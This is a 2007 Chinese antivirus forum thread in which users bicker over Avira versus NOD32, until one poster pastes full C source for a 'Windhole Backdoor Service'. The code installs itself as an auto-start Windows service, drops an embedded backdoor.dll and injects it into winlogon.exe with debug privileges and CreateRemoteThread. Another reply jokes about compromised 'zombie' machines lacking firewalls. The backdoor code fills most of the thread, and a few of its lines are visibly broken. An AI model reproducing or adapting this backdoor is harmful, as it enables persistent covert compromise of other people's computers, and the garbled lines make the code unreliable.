NOD32和小红伞版区气氛的区别

伯夷叔齐

原帖由 easy002008 于 2007-5-23 11:36 发表



既然红伞这么强，别的杀软那么弱，为什么这个“强者”总是与“弱者”比来比去呢，太奇怪的心理

反正我上学时，只跟成绩好的学生比成绩，而且我也很少遇到成绩好的学生会与成绩差的学生比 ...

其实，红伞用户并不屑于和NOD32比高低，因为高低已经很明了,为什么有那么多比较帖呢,因为NOD32太吹了,这个我不说你都知道，看看官方论坛，还有各个论坛的NOD区,吹得那个劲,而且居然对于表现优异的红伞进行诋毁,所以，红伞用户对于你们的作为肯定要回击了,也让更多杀软用户明白NOD的真正实力,对大家挑选杀软有好处嘛...

第二个问题就是你说的样本区的质疑,我告诉你,这些病毒木马不是专门为哪个软件做的，也不是专门为哪个软件优化了的,而是广大用户找到这些毒,并上传来考验杀软的能力,也方便大家对自己支持的软件上报...当然了,也肯定有专门针对免杀的病毒和木马,但毕竟是少数,红伞那么出风头,而且不管是什么原因，那么红伞应该是免杀的头号对象吧,至少在卡饭里应该是头号免杀对象吧....但我们并没有见到过很多，为什么,实力的体现,当然了,有些人见到免杀过不了,干脆正常文件加壳改变特征来让红伞误杀,那好呀,正常文件搞些花哨名堂，红伞照杀不误....

easy002008

原帖由 solcroft 于 2007-5-23 11:47 发表
有些人真得很奇怪
人家把这么明显的致命弱点指出来，他们会以为是在夸奖NOD32
真是活在自己的封闭小世界里

是啊，我总是只与成绩好的学生比成绩 ，世界是小了点

哪能象你这位仁兄，成绩永远第一，但永远与那些差生比成绩，向你致敬

mofunzone

没办法，他们习惯自我满足了，现在我也看开了，在高查杀高误报和低查杀低误报中我宁可选择前者，我宁可把那些不知所以的程序杀掉，或者自己分析后上报排除，也不了一把我自己数据留给病毒破坏，在我10gb的音乐和2gb的照片面前，我首先选择的是安全，而不是误报

easy002008

原帖由 伯夷叔齐 于 2007-5-23 11:49 发表

其实，红伞用户并不屑于和NOD32比高低，因为高低已经很明了,为什么有那么多比较帖呢,因为NOD32太吹了,这个我不说你都知道，看看官方论坛，还有各个论坛的NOD区,吹得那个劲,而且居然对于表现优异的红伞进行诋毁 ...

有些成绩差的人就爱吹牛，你们成绩好的学生就给人家点面子嘛，何必整天跟差生比成绩呢，你搞好自己的学习就行了嘛，何必为差生吹牛那么难过呢

solcroft

原帖由 easy002008 于 2007-5-23 13:20 发表
是啊，我总是只与成绩好的学生比成绩 ，世界是小了点

哪能象你这位仁兄，成绩永远第一，但永远与那些差生比成绩，向你致敬

最可悲的是成绩差的同学自己都还不知情，别人指点它它还洋洋得意，满面春风，十足的阿Q精神

easy002008

原帖由 mofunzone 于 2007-5-23 11:51 发表
没办法，他们习惯自我满足了，现在我也看开了，在高查杀高误报和低查杀低误报中我宁可选择前者，我宁可把那些不知所以的程序杀掉，或者自己分析后上报排除，也不了一把我自己数据留给病毒破坏，在我10gb的音乐和 ...

这就对了
每个人都有自己的爱好和选择，别把自己的爱好强加给别人

用自己喜欢的就行了，别比来比去，何必呢

easy002008

原帖由 solcroft 于 2007-5-23 11:53 发表

最可悲的是成绩差的同学自己都还不知情，别人指点它它还洋洋得意，满面春风，十足的阿Q精神

因为这个差生，从来就没遇到过优等生会与他比成绩，所以他会这样想：要么这个所谓的优等生其实也是个差生，要么自己其实也是个优等生

solcroft

原帖由 easy002008 于 2007-5-23 13:25 发表



因为这个差生，从来就没遇到过优等生会与他比成绩，所以他会这样想：要么这个所谓的优等生其实也是个差生，要么自己其实也是个优等生

明白了，原来有些人见识过别人的实力后，就是这种自欺欺人的心态

[ 本帖最后由 solcroft 于 2007-5-23 13:28 编辑 ]

david_sg

你是不是闲得很无聊？

如果是的话就看看这个吧，别扯皮了。

很经典的DLL注入代码

//Header
#include "bkdlldata.h"
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <psapi.h>
#include <winsvc.h>
//---------------------------------------------------------------------
//Global constant
char SERVICENAME[9] = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";
const char BDRFILENAME[13] = "backdoor.dll";
const char DESTPROC[19] = "winlogon.exe";
//---------------------------------------------------------------------
//Glabal variable
SERVICE_STATUS MyServiceStatus;
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName);
//---------------------------------------------------------------------
//Function definition
int main(int argc,char *argv[])
{

if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
{NULL, NULL}
};

if (!StartServiceCtrlDispatcher( DispatchTable))
{
return 1;
}

return 0;
}


char DestName[MAX_PATH + 1];
char NowName[MAX_PATH + 1];

ZeroMemory(DestName,MAX_PATH + 1);
ZeroMemory(NowName,MAX_PATH + 1);

if (!GetSystemDirectory(DestName,MAX_PATH))
{
printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
return 1;
}

lstrcat(DestName,"\\");
lstrcat(DestName,SRVFILENAME);

if (!GetModuleFileName(NULL,NowName,MAX_PATH))
{
printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
return 1;
}


if (!CopyFile(NowName,DestName,0))
{
printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
return 1;
}


SC_HANDLE newService, scm;

if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
{
printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
return 1;
}

lstrcat(DestName," -service");

if (!(newService = CreateService(scm,
SERVICENAME,
DISPLAYNAME,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
DestName,
NULL, NULL, NULL, NULL, NULL)))
{
printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
}
else
{
printf("Install success!\n");

char *pra[] = {"-service", "\0"};

if (!StartService(newService,1,(const char **)pra))
{
printf("StartService() error = %d\nStart service failure!\n",GetLastError());
}
else
{
printf("Start service Success!\n");
}

}

CloseServiceHandle(newService);
CloseServiceHandle(scm);
return 0;

}
//---------------------------------------------------------------------
DWORD MyWorkThread(void)
{
Sleep(4000);

FILE *fp;

if ((fp = fopen(BDRFILENAME,"wb")) == NULL)
{
WillStop = 1;
return 1;
}

fwrite(data1,sizeof(data1),1,fp);
fwrite(data2,sizeof(data2),1,fp);
fwrite(data3,sizeof(data3),1,fp);
fwrite(data4,sizeof(data4),1,fp);
fwrite(data5,sizeof(data5),1,fp);
fclose(fp);

char FullName[MAX_PATH + 1];

ZeroMemory(FullName,MAX_PATH + 1);
GetSystemDirectory(FullName,MAX_PATH);
lstrcat(FullName,"\\");
lstrcat(FullName,BDRFILENAME);


AddPrivilege(SE_DEBUG_NAME);

HANDLE hRemoteProcess = NULL;
DWORD Pid = ProcessToPID(DESTPROC);

   if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD |
       PROCESS_VM_OPERATION |
       PROCESS_VM_WRITE |
       PROCESS_VM_READ,
       0,
       Pid)) == NULL)
   {
WillStop = 1;
return 1;
   }


   char *pDllName = NULL;

   if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
       NULL,
       lstrlen(FullName) + 1,
       MEM_COMMIT,
       PAGE_READWRITE)) == NULL)
   {
CloseHandle(hRemoteProcess);
WillStop = 1;
       return 1;
   }


   if (WriteProcessMemory(hRemoteProcess,
       pDllName,
       FullName,
       lstrlen(FullName),
       NULL) == 0)
   {
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
       WillStop = 1;
return 1;
   }


  
   PTHREAD_START_ROUTINE pfnStartAddr = NULL;

   if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
       GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
   {
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
       WillStop = 1;
return 1;
   }


   DWORD ThreadId = 0;

CreateRemoteThread(hRemoteProcess,
NULL,
0,
pfnStartAddr,
pDllName,
0,
&ThreadId);

CloseHandle(hRemoteProcess);
   WillStop = 1;
return 0;
}
//---------------------------------------------------------------------
void MyServiceStart (int argc, char *argv[])
{
if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
{
return;
}

MyServiceStatus.dwServiceType = SERVICE_WIN32;
MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwServiceSpecificExitCode = 0;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

DWORD Threadid;


// Initialization code goes here. Handle error condition
if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
{
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
MyServiceStatus.dwWin32ExitCode = GetLastError();
MyServiceStatus.dwServiceSpecificExitCode = GetLastError();

SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
return;
}

// Initialization complete - report running status.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

while(WillStop == 0)
{
Sleep(200);
}

MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
return;
}
//---------------------------------------------------------------------
void MyServiceCtrlHandler (DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
// Do whatever it takes to pause here.
MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;

case SERVICE_CONTROL_CONTINUE:
// Do whatever it takes to continue here.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;

case SERVICE_CONTROL_STOP:
// Do whatever it takes to stop here.
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;

SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);

WillStop = 1;
return;

case SERVICE_CONTROL_INTERROGATE:
// Fall through to send current status.
break;


}

// Send current status.
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}

return;
}
//---------------------------------------------------------------------

int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;

if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken error.\n");
return 1;
}

if (!LookupPrivilegeValue(NULL,Name,&Luid))
{
printf("LookupPrivilegeValue error.\n");
return 1;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;

if (!AdjustTokenPrivileges(hToken,
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL))
{
printf("AdjustTokenPrivileges error.\n");
return 1;
}

return 0;
}
//---------------------------------------------------------------------

DWORD ProcessToPID(const char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";

AddPrivilege(SE_DEBUG_NAME);

PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
return 0;
}

cProcesses = cbNeeded / sizeof(DWORD);

for ( i = 0; i < cProcesses; i++ )
{

hProcess = OpenProcess( PROCESS_QUERY_INformATION |
PROCESS_VM_READ,
FALSE, aProcesses);

if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName( hProcess, hMod,
szProcessName, sizeof(szProcessName) );

if(!stricmp(szProcessName, InputProcessName))
{
CloseHandle( hProcess );
return aProcesses;
}
}
}//end of if ( hProcess )
}//end of for

CloseHandle( hProcess );
return 0;
}
//---------------------------------------------------------------------

mofunzone

哎呀，些英文作业去了，macbeth的问题很烦人
p.s 注入没前途了，防火墙都有提示。。
祈祷肉鸡没防火墙吧。。